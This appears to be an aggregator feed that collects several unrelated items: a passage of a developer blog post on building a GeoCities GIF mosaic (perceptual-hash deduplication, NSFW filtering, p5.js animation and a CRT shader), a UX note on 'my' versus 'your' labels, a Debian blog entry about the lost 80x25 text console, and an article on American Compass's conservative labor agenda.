Well, now we’re talking about perceptual similarity instead of exact matching. To compare the GIFs in a way that takes this into account, I used Python’s imagehash library to calculate a perceptual hash.
1. Reduce image size. The fastest way to remove high frequencies and detail is to shrink the image. In this case, shrink it to 8x8 so that there are 64 total pixels. Don’t bother keeping the aspect ratio, just crush it down to fit an 8x8 square. This way, the hash will match any variation of the image, regardless of scale or aspect ratio.
2. Reduce color. The tiny 8x8 picture is converted to a grayscale. This changes the hash from 64 pixels (64 red, 64 green, and 64 blue) to 64 total colors.
3. Average the colors. Compute the mean value of the 64 colors.
4. Compute the bits. This is the fun part. Each bit is simply set based on whether the color value is above or below the mean.
5. Construct the hash. Set the 64 bits into a 64-bit integer. The order does not matter, just as long as you are consistent. (I set the bits from left to right, top to bottom using big-endian.)

Source.
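Those five steps are compact enough to hand-roll. Here’s a rough sketch for illustration (not the library’s actual code):

from PIL import Image

def average_hash_64(img):
    # 1. shrink to 8x8, ignoring aspect ratio
    small = img.resize((8, 8), Image.LANCZOS)
    # 2. reduce to grayscale - one value per pixel
    pixels = list(small.convert('L').getdata())
    # 3. average the 64 values
    mean = sum(pixels) / len(pixels)
    # 4 & 5. one bit per pixel (above/below the mean),
    # packed left to right, top to bottom
    bits = 0
    for p in pixels:
        bits = (bits << 1) | (1 if p > mean else 0)
    return bits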
This process is what imagehash uses under the hood, and it yields great results for detecting image similarity. But a GIF is not just one image - it’s made up of many frames! Comparing one frame alone could easily miss duplicates where the first frames differ but the rest are the same. To cover this, I sampled multiple frames evenly across the animation and hashed each one individually. This way, two files will be flagged as duplicates if they share even one visually similar frame. It’s not perfect - two near-duplicates might miss each other if their sampled frames don’t overlap - but this catches the majority of cases while staying fast.
Here’s an example of calculating these hashes in Python:
from PIL import Image
import imagehash

def sample_frames_evenly(gif_path, num_samples=5):
    frames = []
    with Image.open(gif_path) as img:
        try:
            frame_count = img.n_frames
        except Exception:
            frame_count = 1
        if frame_count == 1:  # stills...
            frames.append(img.copy())
            return frames
        if frame_count <= num_samples:
            frame_indices = list(range(frame_count))
        else:
            step = frame_count / num_samples
            frame_indices = [int(i * step) for i in range(num_samples)]
        for frame_idx in frame_indices:
            img.seek(frame_idx)
            frames.append(img.copy())
    return frames if frames else None

def get_gif_frame_hashes(filepath, sample_frames=5):
    frames = sample_frames_evenly(filepath, sample_frames)
    if not frames:
        return None
    hashes = []
    for frame in frames:
        hashes.append(str(imagehash.average_hash(frame)))
    return hashes
The next step in processing these is to store which hashes we’ve already seen as we’re looping through each GIF, and then remove any GIF containing a hash we’ve seen before. And hey presto - no more duplicates!
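As a rough sketch, building on get_gif_frame_hashes from above (deleting in place is my own assumption - quarantining the dupes would work just as well):

import os

def dedupe(gif_paths):
    seen = set()
    for path in gif_paths:
        hashes = get_gif_frame_hashes(path) or []
        # a GIF counts as a dupe if any sampled frame's hash
        # matches one from a GIF we've already kept
        if any(h in seen for h in hashes):
            os.remove(path)
            continue
        seen.update(hashes)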
But what’s worse than showing the same GIF twice onstage? Let’s look at that next…
Removing NSFW
Let’s recap - when you bulk download tens of thousands of images from the internet, you don’t just get dancing hamsters - you also get things you really don’t want projected six feet tall at a public gig.
I used the vit-base-nsfw-detector image classifier for this. Feed it a frame from a GIF and it’ll run it through a transformer that returns a SFW or NSFW label along with a confidence score between 0 and 1, with 1 being the “I’m very sure this is smut” end of the scale. For this dataset, anything above a 0.4 tended towards no-no territory.
This particular model is a fine-tuning of Google’s vit-base-patch16-384 (trained on ImageNet21K’s 14 million images). I tried a few, and this one was a standout in its prudishness.
But here’s where my naivete got the best of me again and I learned something new: a few GIFs start out wholesome but then get very naughty very quickly. Dancing one moment turns into undressing the next. The first frame passes the censor, but by frame 20 I’m in breach of the public decency act.
Luckily I already had the tool for the job from the previous deduplication step: sampling multiple frames evenly throughout the GIF and running them all through the classifier. That way we check for decency at multiple points in the GIF. Undressers… consider yourselves thwarted!
Moving right along, here’s the code. It’s amazing how easy PyTorch and Hugging Face make it to run models like this locally:
from transformers import pipeline
import torch

# this example assumes you've got a GPU capable of running the model.
# you should also be able to run it on CPU instead, but invoking it
# would look a bit different.
#
# as an aside, my graphics card made a coil whine at a pitch I'd
# never heard it make before while taking on this workload.
# was it... enjoying itself?
CLASSIFIER = pipeline(
    "image-classification",  # labels (SFW, NSFW)
    model="AdamCodd/vit-base-nsfw-detector",
    device=0
)

def is_nsfw(gif_path, num_frames=5):
    # from the previous example
    frames = sample_frames_evenly(gif_path, num_frames)
    if not frames:
        return False

    # gotta make sure frames are RGB for our classifier
    rgb_frames = []
    for frame in frames:
        if frame.mode != 'RGB':
            frame = frame.convert('RGB')
        rgb_frames.append(frame)
    frames = rgb_frames

    max_nsfw_score = 0
    for frame in frames:
        results = CLASSIFIER(frame)
        for result in results:
            if result['label'] == "NSFW":
                max_nsfw_score = max(max_nsfw_score, result['score'])
    return max_nsfw_score >= 0.4
Something that this doesn’t catch is NSFW text inside GIFs. For example, there are a few banners in the dataset with BIG letters making declarations like “I LOVE ****”.
I could’ve implemented an OCR step in the pipeline to pick up on bad words. But honestly, life’s too short to put every naughty GIF in its place. Some are just destined to slip through the cracks.
(btw, if you’re feeling curious and you’re not sitting in an open plan office, you can undo all my hard work and disable filtering by setting the ?safe=no query param: gifs.alex.works?safe=no. Don’t say I didn’t warn you!)
With that, the worst of the smut was cleaned out, leaving just one last sanitisation step…
Removing cat photos
Removing cat photos? Just kidding, I didn’t do this. What kind of monster would remove cat photos from their mosaic of GIFs?
But an interesting finding is that this did actually happen, albeit unintentionally. The image classifier I mentioned in the previous step yielded a lot of false positives when it looked at GIFs of cats.
I’ll leave speculating as to why that is as an exercise for the reader!
Animating
With the GIFs downloaded and mostly sanitised, the next step was to display them. My goal was to have this rendering in-browser, and I thought this’d be a good opportunity to play around with p5.js, which provides a lovely set of APIs for 2D and 3D on top of HTML Canvas/WebGL. If you’ve used Processing before you’ll find it feels very similar (it’s made by the same people).
It’s also got a great online editor for quickly testing ideas. I’ll use it later in the post to share some examples.
You can view the full code for my sketch at https://gifs.alex.works/assets/sketch.js, warts and all - my goal here was to get it working for the show - performance optimisation and ease of extension took a backseat.
Let’s talk through some of the more interesting parts though…
Building the grid
The main idea of the animation is to create a grid of GIFs that slowly pans across the screen. Rows are created to fill the screen vertically, and cells containing GIFs are created within those rows til the screen is filled horizontally too.
Once a screenful of GIFs has loaded, the GIFs should keep streaming in infinitely. To achieve this effect without eventually consuming all RAM in the universe, I remove GIFs that have gone off the left-hand side of the screen, while lazy loading the ones just about to appear on the right.
In an early implementation the row height was the same for all rows and everything panned at the same speed. This looked dull. A nice way to add some visual flair was to randomise the size of each row as well as its panning speed.
Here’s a simplified version of my code that uses a single hard-coded GIF so we can focus on layout, panning, and recycling:
const GIF_URL = 'goku.gif'
const BASE_ROW_HEIGHT = 60
const PADDING = 8
const PAN_PER_FRAME = 0.5

let rows = []
let panX = 0
let sourceImg

function preload() {
  sourceImg = loadImage(GIF_URL)
}

function setup() {
  createCanvas(windowWidth, windowHeight)
  buildRows()
  fillInitialCells()
}

function buildRows() {
  rows = []
  let y = 0
  while (y < height) {
    // add some visual interest by randomising height of the
    // row, as well as its panning speed multiplier
    const h = BASE_ROW_HEIGHT + random(0, 50)
    rows.push({
      y,
      height: h,
      speedMul: random(1, 2.5),
      offsetX: 0,
      cells: []
    })
    y += h + PADDING
  }
}

function addCell(row) {
  const aspect = sourceImg.width / sourceImg.height
  const w = Math.floor(row.height * aspect)
  row.cells.push({
    width: w,
    img: sourceImg
  })
}

function fillInitialCells() {
  // fill a little beyond screen width for smoother start
  rows.forEach(row => {
    while (rowWidth(row) < width * 1.2) addCell(row)
  })
}

function rowWidth(row) {
  return row.cells.reduce((sum, c, i) => sum + c.width + (i > 0 ? PADDING : 0), 0)
}

function draw() {
  background(0)
  if (!sourceImg) return
  panX += PAN_PER_FRAME
  rows.forEach(row => {
    const rowPan = panX * row.speedMul
    // need another cell appearing on the right?
    if (row.offsetX + rowWidth(row) < width + rowPan) {
      addCell(row)
      removeOffscreen(row, rowPan)
    }
    push()
    translate(-rowPan, row.y)
    let x = row.offsetX
    row.cells.forEach(cell => {
      image(cell.img, x, 0, cell.width, row.height)
      x += cell.width + PADDING
    })
    pop()
  })
}

function removeOffscreen(row, rowPan) {
  // recycle cells fully scrolled past the left edge
  while (row.cells.length) {
    const first = row.cells[0]
    const firstRight = row.offsetX + first.width
    if (firstRight < rowPan) {
      row.offsetX += first.width + PADDING
      row.cells.shift()
    } else {
      break
    }
  }
}
That code is pretty close to what’s on gifs.alex.works at the moment, save a few extra things that the live site does:

- It fades in cells once they’ve loaded instead of abruptly displaying them,
- Its GIFs aren’t hardcoded (duh!). Instead it fetches a list of random ones from the server and downloads them with some concurrency limits - you can explore the sketch.js file to see how this works.
CRT shader
To seal the retro vibe deal I added a CRT shader to the canvas (thanks to Babylon.js for the shader code).
p5.js makes it very easy to load in a shader defined in GLSL and apply it as a filter to an existing canvas, which is exactly what I did:
const GIF_URL = 'goku.gif'

let gifImg
let buffer, crt

function preload() {
  gifImg = loadImage(GIF_URL)
}

function setup() {
  createCanvas(windowWidth, windowHeight)
  initBuffer()
}

function initBuffer() {
  // create a buffer at a max width of 1920 for our draws. we don't
  // want to exceed this width because otherwise too many GIFs will
  // be loaded at once and we'll tank performance.
  const bw = min(windowWidth, 1920)
  const scale = windowWidth / bw
  const bh = Math.floor(windowHeight / scale)
  buffer = createGraphics(bw, bh, WEBGL)
  buffer.pixelDensity(1)
  // instantiate the shader
  crt = buffer.createFilterShader(CRT_SHADER_SRC)
}

function draw() {
  buffer.background(0)
  // tile the gif to fill the buffer for a prettier example
  if (gifImg) {
    const tileW = gifImg.width
    const tileH = gifImg.height
    buffer.push()
    buffer.imageMode(CORNER)
    // note: WEBGL origin is center, so iterate from -width/2,-height/2
    const startX = -buffer.width / 2
    const startY = -buffer.height / 2
    for (let ty = startY; ty < buffer.height / 2; ty += tileH) {
      for (let tx = startX; tx < buffer.width / 2; tx += tileW) {
        buffer.image(gifImg, tx, ty, tileW, tileH)
      }
    }
    buffer.pop()
  }
  // apply the shader
  if (crt) buffer.filter(crt)
  background('black')
  // draw the image back to the main buffer (the onscreen canvas)
  // and scale it so it fits
  image(buffer, 0, 0, width, height)
}

// https://babylonjs.medium.com/retro-crt-shader-a-post-processing-effect-study-1cb3f783afbc
const CRT_SHADER_SRC = `
precision highp float;

uniform sampler2D tex0;
varying vec2 vTexCoord;

vec2 curveRemapUV(vec2 uv) {
  // as we near the edge of our screen apply greater distortion using a cubic function
  uv = 2.0 * uv - 1.0;
  vec2 curvature = vec2(6.0);
  vec2 offset = abs(uv.yx) / curvature;
  uv = uv + uv * offset * offset;
  uv = uv * 0.5 + 0.5;
  return uv;
}

vec4 adjBrightness(vec2 inUV, vec4 clr) {
  float r = 0.5;
  vec2 cornerUV = min(2.0 * (0.5 - abs(inUV - vec2(0.5))) + r, 1.0);
  float br = cornerUV.x * cornerUV.y + 0.15;
  br = pow(cornerUV.x * cornerUV.y, 2.2) + 0.45;
  br = clamp(br * br * br * br + 0.55, 0.0, 1.0);
  return clr * br;
}

void main() {
  vec2 remappedUV = curveRemapUV(vTexCoord);
  vec4 baseColor = texture2D(tex0, remappedUV);
  if (remappedUV.x < 0.0 || remappedUV.y < 0.0 || remappedUV.x > 1.0 || remappedUV.y > 1.0) {
    gl_FragColor = vec4(0.0, 0.0, 0.0, 1.0);
  } else {
    gl_FragColor = adjBrightness(vTexCoord, baseColor);
  }
  gl_FragColor *= abs(sin(remappedUV.y * 1024.0));
  gl_FragColor.a = 1.0;
}
`
Switching from 2D rendering to WebGL changes the coordinate origin to the center of the canvas, as opposed to the top left. So some maths has to be updated accordingly.
You can set the ?shader=no query param on the site if you want to see what it looks like without the shader: gifs.alex.works?shader=no
Starfield
The grid on its own looked good, but there was still something missing. The background was just plain black. That is prime real estate for more nostalgic throwbacks, so I capitalised on the opportunity and added a starfield effect.
The stars are randomly distributed on the canvas, and pan left over time. When one goes off the left of the screen, it reappears again on the right at a random point on the y axis.
Initially I drew a little circle for each star, but I worried that with a large enough screen and a slow enough computer, drawing up to 2,000 circles per frame would bog down performance. So I switched to adding each star as a vertex on one big POINTS shape instead, and just drawing that shape. This resulted in just one draw call per frame:
let stars = []

function setup() {
  createCanvas(windowWidth, windowHeight)
  initStars()
}

function draw() {
  background('black')
  drawStars()
}

function initStars() {
  const maxStars = 2000
  const density = 1000 // bigger = fewer stars
  const target = Math.min((width * height) / density, maxStars)
  for (let i = 0; i < target; i++) {
    stars.push({
      x: random(0, width),
      y: random(0, height),
      speed: random(0.1, 0.5),
      size: random(0.5, 3)
    })
  }
}

function drawStars() {
  stroke(255, 255, 255, 150)
  strokeWeight(2)
  beginShape(POINTS)
  stars.forEach(s => {
    s.x -= s.speed
    if (s.x < 0) {
      s.x = width
      s.y = random(0, height)
    }
    vertex(s.x, s.y)
  })
  endShape()
}
With a backdrop for the GIFs, the animation was done. But there was still something ruining my fun…
GIFs crashing the sketch
p5.js could not decode all the GIFs I’d sourced, and regrettably its behaviour when coming across a dodgy one was to outright crash the sketch in an unrecoverable way. I raised an issue on p5.js’s GitHub about this, but in the interest of getting things working in time for the show I hacked together a quick fix in a fork that I’m now using on the live site.
It helped with not outright crashing the sketch when a GIF failed to load, but the overall miss rate on the GIFs was still quite high - and downloading them just to throw them in the bin was causing a lot of unnecessary bandwidth and processing churn.
I attempted ways to detect invalid GIFs serverside but couldn’t exactly narrow down what would make p5.js crash. Some of its failures seemed quite arbitrary, so I changed tack and wrote a sketch to iterate through all the GIFs and try to load them. If one didn’t work it’d catch the error and send a signal back to the server indicating that the particular file is bad and should be quarantined.
This hacky approach worked well, and I haven’t seen a GIF load error since:
let data, i = 0, ok = 0, bad = 0
function preload() {
data = loadJSON('load from gifs api')
}
function setup() {
createCanvas(600, 200)
next()
}
function next() {
if (!data || i >= data.urls.length) return
const url = data.urls[i++]
loadImage(url,
img => { ok++; schedule() },
_err => {
bad++ // here's where i made a request to backend
// to mark gif as invalid
schedule()
}
)
}
function schedule() { setTimeout(next, 10) }
function draw() {
if (!data) return
background(0)
fill(255)
textAlign(CENTER, CENTER)
const total = data.urls.length
text(`Checked ${i}/${total}`, width/2, height/2-20)
text(`valid ${ok} invalid ${bad}`, width/2, height/2+10)
}
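For completeness, the backend call in that error handler could be as simple as a fetch to a quarantine endpoint. A sketch, assuming a hypothetical /quarantine route (the post doesn't show the real API):
fetch('/quarantine', {
method: 'POST',
headers: { 'Content-Type': 'application/json' },
body: JSON.stringify({ url }) // the GIF that failed to load
})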
Hosting
Hosting this thing is intentionally unremarkable. It’s being served out of a one-file Go app on my server, sitting behind the glorious Cloudflare proxy (seriously, how is that thing free?)
When the app starts up it reads the GIF paths from the filesystem, and serves a random assortment of URLs to the frontend. It also serves up the actual image files when they’re requested, with generous cache TTLs so Cloudflare absorbs as much of that traffic as possible.
Optimisation ideas
There’s definitely room for optimisation here. A screenful of GIFs can number in the hundreds, so a fair bit of network bandwidth gets used when viewing the site. This inefficiency is the first thing I’d tackle if I were making improvements.
There are two parts to this problem which I’ve considered:
GIF size
: GIFs are an especially large format considering how much visual data they actually convey. Switching to something more efficient and modern like WebM would greatly help reduce the size of the files being transferred.
Number of requests
: assembling a few GIFs into a longer strip and sending that as one file would help reduce the number of web requests being made.
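To sketch that second idea: if several GIFs were stacked vertically into one strip image, the frontend could draw each cell with p5's nine-argument image() call, which copies a sub-rectangle of the source. This assumes fixed cell dimensions, which the real feed wouldn't necessarily guarantee:
const CELL_W = 200 // assumed fixed cell size in the strip
const CELL_H = 150
// draw the nth GIF from a vertical strip image at (x, y)
function drawCell(strip, n, x, y) {
image(strip, x, y, CELL_W, CELL_H, 0, n * CELL_H, CELL_W, CELL_H)
}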
Also functionally, I think it’d be neat to add some more interactivity to the site, like being able to scroll on rows so you can backtrack to a GIF you wanted to look at for longer. Or being able to click on a GIF to go to the GeoCities site in the Archive that it originated from.
However, neither of these things would’ve helped with projecting the grid at a gig, so I left ’em on the table.
Conclusion
And there you have it. It was a blast working on this and bringing a bit of GeoCities chaos back to life for a few minutes. Now I’ve just gotta figure out how to up the ante next year :)
Huge thanks again to the Internet Archive for preserving GeoCities - this project would have been much harder without them. Please
donate to the Archive
if you can!
When referring to the user’s stuff, which is better out of these:
“My account” or “Your account”?
“My orders” or “Your orders”?
“My cases” or “Your cases”?
It’s a trick question because often you don’t need any prefix and can just use:
Account
Orders
Cases
Amazon is a good example of this in action because it’s obvious that it’s your account and your orders:
But what if your product contains things that belong to you and to others – for example, a case working system that contains your cases and everyone else’s?
The problem with “my”
You could use “My cases” in a navigation menu like this:
This seems fine on the face of it.
But screens are not only accessed or referred to through a menu.
For example, you might need to signpost users to their cases in an onboarding flow, email notification or help article.
Saying something like “Go to my cases” is awkward and unnatural – if I told you to go to my cases, you’d think I was telling you to go to my cases, not yours.
Similarly, a support agent might tell you to “Go to your cases” over webchat or a phone call. This is confusing if the UI says “My cases”.
These issues just don’t come up when you use “your” – I’ve used this approach in multiple products over the years, and seen exactly zero issues in user research.
So that’s good.
“But what if the user is communicating to us using radio buttons, for example?”
This is easy if we look at an example:
This doesn’t make sense because it sounds like you’re instructing the computer to share its profile, not yours.
But it’s clear if you use “my”:
In summary:
Use “your” when communicating to the user
Use “my” when the user is communicating to us
If you’d like to design forms that nail basic details like this, as well as complex problems found in enterprise systems, you might like my course, Form Design Mastery:
John Goerzen: I just want an 80×25 console, but that’s no longer possible
PlanetDebian
changelog.complete.org
2025-09-16 02:53:29
Somehow along the way, a feature that I’ve had across DOS, OS/2, FreeBSD, and Linux — and has been present on PCs for more than 40 years — is gone.
That feature, of course, is the 80×25 text console.
Linux has, for a while now, rendered its text console using graphics modes. You can read all about it...
Somehow along the way, a feature that I’ve had across DOS, OS/2, FreeBSD, and Linux — and has been present on PCs for more than 40 years — is gone.
That feature, of course, is the 80×25 text console.
Linux has, for a while now, rendered its text console using graphics modes.
You can read all about it here.
This has been necessary because only PCs really had the 80×25 text mode (Raspberry Pis, for instance, never did), and even they don’t have it when booted with UEFI.
I’ve lately been annoyed that:
The console is a different size on every screen — both in terms of size of letters and the dimensions of it
If a given machine has more than one display, one or both of them will have parts of the console chopped off
My system seems to run with three different resolutions or fonts at different points of the boot process: one during the initrd, and two different ones during the rest of the boot.
And, I wanted to run some software on the console that was designed with 80×25 in mind. And I’d like to be able to plug in an old VGA monitor and have it just work if I want to do that.
That shouldn’t be so hard, right? Well, the old
vga=
option that you are used to
doesn’t work when you boot from UEFI or on non-x86 platforms
. Most of the tricks you see online for changing resolutions, etc., are no longer relevant. And things like setting a resolution with GRUB are useless for systems that don’t use GRUB (including ARM).
VGA text mode
uses 8×16 glyphs in 9×16 cells
, where the pixels are non-square, giving a native resolution of 720×400 (which historically ran at 70Hz) that should be displayed with stretched pixels to make a 4:3 image.
While it is possible to select a console font, and 8×16 fonts are present and supported in Linux, there appears to be no standard way to set a 720×400 mode so that the console presents at a reasonable size, at the correct aspect ratio, with 80×25.
Tricks like
nomodeset
no longer work on UEFI or ARM systems. It’s possible that
kmscon
or something like it may help, but I’m not even certain of that (video=eDP1:720x400 produced an error saying that 720x400 wasn’t a supported mode, so I’m unsure kmscon would be any better). Not that it matters; all the kmscon options to select a font or zoom are broken, and it doesn’t offer mode selection anyhow.
I think I’m going to have to track down an old machine.
Sigh.
Building a Conservative Labor Movement: American Compass and the Right’s Pro-Worker Policy Agenda
Portside
portside.org
2025-09-16 02:48:12
Building a Conservative Labor Movement: American Compass and the Right’s Pro-Worker Policy Agenda
Stephanie
Mon, 09/15/2025 - 21:48
...
What does it look like when the right attempts to articulate its own version of a “pro-worker” program? That is the question driving the American Compass think tank. Founded during the last year of Donald Trump’s first term in the White House, American Compass has spent the last five years puzzling through what it would take to “exit right from neoliberalism” (a question that animated Trump’s return to Washington, D.C. four years later).
1
Led by Oren Cass, a former management consultant and policy director for Mitt Romney’s 2012 presidential campaign, American Compass has focused on convincing the Republican Party to abandon its decades-long commitment to “free market” orthodoxy. In its place, Cass and his colleagues argue that the party’s future depends on laying the political and social foundation for building a “conservative labor movement.”
That project requires embracing some kind of labor organizing on the job, greater public investment in the nuclear family, and using the assault on undocumented workers to “tighten” labor markets and raise wages. Therein lies the foundation for what American Compass describes as a broader political realignment away from a crumbling neoliberal order and onwards toward the restoration of “an economic consensus that emphasizes the importance of family, community, and industry to the nation’s liberty and prosperity.”
2
These are policies that harken back to the blue-collar, neoconservative welfarism of the Nixon years mixed with the fierce anti-immigrant xenophobia unleashed by Pat Buchanan in the 1990s that Steve Bannon resuscitated for Trump’s 2016 campaign.
3
American Compass, though, translated this rabid, reactionary populism into a blandly wonkish, nominally colorblind program to plan for the social reproduction of a nativist “working-class nationalism.” This programmatic vision won early and enthusiastic support from figures who styled themselves as part of a “new right” that would go on to occupy leading positions in the second Trump administration such as Vice President J.D. Vance and Secretary of State Marco Rubio as well as Senators Josh Hawley (R-MO) and Tom Cotton (R-AR). In the face of a complacent neoliberal Democratic Party, these right-wing figures seek to position themselves as the only ones able to speak to the frustrations of working people facing miserable and uncertain times. This also has an appeal to certain union leaders—such as Sean O’Brien of the International Brotherhood of Teamsters, who spoke at the Republican National Convention in 2024—who are trying to seize an opening to both deliver for their members and perhaps win over the support of Trump-voting members by allying with a nationalist, anti-neoliberal new right.
Nevertheless, neither the president nor a significant number of Republican legislators stand ready to advance policies that would empower even a narrow stratum of workers to wrest higher wages from employers and claim a modest suite of public welfare benefits. After all, it is corporate conglomerates, financiers, and agribusinesses—not to mention the hardcore Trumpist base among the “lumpen bourgeoisie” of construction contractors and car dealers—that anchor the contemporary Republican Party.
4
For example, American Compass backed then-Florida Senator Marco Rubio’s TEAM Act, which called for “voluntary” non-union “employee involvement organizations,” but the bill never made it out of committee.
5
Despite limited congressional success and the suffocating impact of Trump’s personal authority over the Republican agenda, American Compass is laying the foundation for a long-term push to reorient the party’s policy priorities. According to American Compass ally Josh Hawley, the second Trump administration desperately needs to undertake right-wing, pro-worker “policy work” or else Republicans will find themselves back in “the political wilderness.”
6
Cass’ think tank is undertaking this project amid accelerating workplace conflicts. In the face of modest but important and renewed labor militancy in the first half of the 2020s, American Compass’ program to give workers “a seat at the table” has conceded a not insignificant point. The many sticks deployed to divide, discipline, and deport working people need to be supplemented with some carrots. Exploring American Compass’ approach to labor law reform, driving undocumented workers from the labor market, and subsidizing nuclear families reveals what it means to give content to those vague right-wing promises to rescue a forgotten “little people” from the clutches of “big business.”
Family Labor
Oren Cass comes to the “labor question” from the leafy environs of well-to-do Massachusetts. He completed a degree in political economy at Williams College—a major focused on economic thought rather than quantitative economic modeling—and then earned a law degree at Harvard. From there, he worked as a management consultant for the Boston-based Bain & Company before working on former Bain CEO Mitt Romney’s 2012 presidential bid, developing the campaign’s “jobs book.”
7
Reflecting on Romney’s defeat during an interview at his undergraduate alma mater, Cass described how the Republican Party’s “blind faith in free markets” left it unable to win elections, much less address the gnawing social (and moral) crises left by decades of austerity, deregulation, and privatization.
8
Following his stint on the Romney campaign, Cass joined the conservative Manhattan Institute think tank and wrote his 2018 book
The Once and Future Worker: A Vision for the Renewal of Work in America
. Cass’ book rejected the conventions of the neoliberal consensus that mass prosperity trickles down by slashing taxes, crushing unions, and cutting regulatory red tape. “The alternative is to make trade-offs that instead place the renewal of work and family, sustained by a healthy labor market, at the center of public policy.”
9
Putting the “renewal of work and family” at the center of conservative policymaking became even more urgent as the scale and scope of the Covid-19 pandemic brought long simmering conflicts over social policy priorities to the fore. “The massive economic policy interventions of 2020, like of 2008, were Janus-faced,” writes economic historian Adam Tooze, imposed from above to preserve financial markets but in ways that exploded the common sense of neoliberal governance.
10
The first Trump administration and Republicans in Congress vacillated over how to respond to the unprecedented disruptions to the circuits of global capitalism, especially in terms of how (and whether) to deliver direct aid to people facing sudden unemployment, hunger, and disability; the Democratic Party under Joe Biden (along with center-left parties the world over) proposed to speed post-pandemic recovery through renewed investments in manufacturing and infrastructure, but also in social services and education.
11
The result drew a predictably furious response from a Republican Party still bound to the Reaganite consensus on austerity, but also gave new traction to Cass’ argument that conservatives need to undertake positive reforms for those “left behind” by the wrenching economic transformations of the neoliberal order. The opening of those horizons also reinforced Cass’ insistence that pandemic recovery could not become a Trojan Horse for more sweeping social-democratic reforms, especially at the level of the family.
American Compass returned to the neoconservative question of how to construct a policy ensemble necessary to promote the nuclear family form—the most basic unit of capitalist social reproduction—without either undermining the compulsion to undertake waged work or by foisting the “public” market on the “private” space of the home.
12
In 2021, while households still reeled from the aftershocks of the pandemic, Cass and American Compass issued a policy proposal calling for an “expanded social compact for working families.” The proposed Family Income Supplemental Credit (FISC) calls for supplemental Social Security payments of “$800 per month to pregnant women beginning in fifth month of pregnancy, $400 per month from birth until the child’s sixth birthday, and then $250 per month until the child’s eighteenth birthday” to wage-working families with children (with a 20 percent boost for legally married couples). The FISC follows much the same framework as the “welfare reforms” of the 1990s: it is means-tested, time-limited, and comes with waged-work requirements. Yet, the design of the FISC amends those old nostrums of austerity with what Cass and his coauthor Wells King describe as “a major financial commitment . . . to shore up the economic and cultural foundations on which people build their lives.” They present the FISC as a form of “reciprocal social insurance” paid out to working families who will eventually pay that support forward when (or if) their economic situation improves. At the same time, they explicitly contrast the FISC to more generous forms of direct public assistance such as cash transfer payments or a “parenting wage.” They take the familiar position on the right that cash payments undermine the “self-sufficiency” that supposedly comes from performing waged labor, while insisting that public monies cannot (and ought not) pay for “private” familial labor. Along those same lines, they also reject the neoliberal “natalist subsidy” for making the decision to have and raise children a “utility-maximizing decision.”
13
The institutional and ideological parameters of American Compass’ new social compact illuminate the contradictions inherent in conservative welfare state building. The design of the FISC recalls the abortive Family Assistance Plan (FAP) put forward by the Nixon administration which also called for at once dramatically expanding the provision of social welfare to working couples with children while dramatically limiting how much they could claim and for how long.
14
Much like the FAP, the FISC frames the skyrocketing cost of living as a moral as much as a material crisis threatening the long-term reproducibility of the nuclear family, itself the cradle for reproducing labor productivity and discipline. Both programs also understood that capital was shirking its share of responsibility for meeting this basic biopolitical objective. Indeed, in the 1970s, the FAP failed precisely because organized industry and employer groups lobbied hard to convince legislators that any benefit, no matter how paltry, threatened to not only drive up wages (especially among the lowest paid and most desperate workers) but weaken their power over workplaces.
15
While Cass and King took pains to address those concerns in the twenty-first century, prospective conservative welfare state builders—just like their Keynesian rivals—still face the almost implacable hostility of employers to anything that might undermine their unilateral power on the job.
16
Since the FISC only provides for a small childcare subsidy, the bulk of the money needed to hold together the nuclear family still needs to come from higher wages in the labor market.
“A Seat at the Table”
While employers covet such absolute authority on the job, Cass argues that the purpose of public policy is to ensure that managerial prerogatives do not come at the expense of social stability or economic efficiency. In American Compass’ founding letter, Cass drew on classical liberalism to sketch a political economy that allowed for some measure of social struggle to force through necessary changes. The founding principles of the United States’ Constitutional order, he writes, “ensure that prospective competitors can enter our markets, our civil society, and our politics, so that entrenched incumbents face constant pressure—and when some do snap rather than bend, replacements stand ready to fill the void.”
17
For American Compass, that pressure needs to be carefully managed and calibrated to preserve the proper and ostensibly harmonious nature of capitalist markets. A 2020 open letter from American Compass signed by JD Vance, then U.S. Senator Marco Rubio, former U.S. Attorney General Jeff Sessions, and a host of conservative economists and policy analysts concluded: “In a well-functioning and competitive market, participants meet as equals able to advance their interests through mutually beneficial relationships.”
18
That language betrays the contradictions bedeviling any political project to reform capitalist social relations. Who is empowered to decide what constitutes a “mutually beneficial” relationship, and what does it actually mean to “meet as equals” at the point of production and in the corridors of power? Unlike other voices on the right, American Compass makes clear that there needs to be pressure applied on capital to ensure that people earn enough to reproduce themselves as diligent and efficient laborers.
Bringing the appropriate amount of bottom-up pressure to bear on the workplace requires significant labor law reform, as unions and their partisans have long argued. American Compass urges amending the National Labor Relations Act (NLRA) to allow for more “cooperative” deliberative arrangements such as works councils and electing worker representatives to company boards. While the NLRA originally outlawed such set ups to prevent employer-dominated bodies from frustrating genuine worker organizations, American Compass’ Chris Griswold argues the Magna Carta of U.S. labor law instead reinforced an inherently “adversarial” collective bargaining regime. Allowing for more “collaborative” bargaining would create more efficient and less antagonistic workplaces, not to mention increase workers’ ability to win higher wages and better working conditions. That all depends on ensuring that workers’ “voices” are in fact represented and heard, not shunted into company unions.
19
Much like the Family Income Supplemental Credit, giving workers a “seat at the table” demands a tense dance between expanding and containing worker organizing. American Compass recently partnered with YouGov and announced growing public support for unions in general—including barring captive audience meetings and expediting contract negotiations—but not for reforms to enable greater organizing such as card check authorizations, sharing personal contact information with union organizers, or an end to state right-to-work laws.
20
In op-ed pieces, Cass has also denounced unions’ electoral politicking as an impediment to collaborative workplace relations and claims that workers only want apolitical unions.
21
These proposals, as well as claims about what working people want, come as growing numbers of workers are organizing themselves on the job, taking great risks, and winning some important victories. Industrial workers have recently taken to the picket lines at John Deere, Kellogg’s, and the Big Three auto plants to reverse decades-old concessions to management on pay and benefits; Amazon workers are fighting digital Taylorism in warehouses; baristas are fighting the petty tyranny of store managers enforcing corporate discipline as a form of union-busting in Starbucks stores; teachers and nurses have fought to expand gains won over the past decade; and writers and actors recently took on the Hollywood conglomerates in a dual strike. These dramatic work stoppages took place alongside more quotidian (and far-reaching) refusals of onerous and poorly paid work that in turn forced employers to improve pay in care, food service, and retail jobs.
22
At this militant conjuncture, American Compass is busy articulating a preemptive policy program to channel and control workers’ self-activity. After all, without it, workers’ own organizing may well force more expansive reform or win victories beyond the scope of law and legislation.
There are also those in the ranks of organized labor who might prefer American Compass’ version of labor law reform. Take, for instance, David Rolf, the former president of Service Employees International Union (SEIU) Local 775, who is now listed as a “Compass Advisor” on the think tank’s website and has described reading Cass’
The Once and Future Worker
with delight.
23
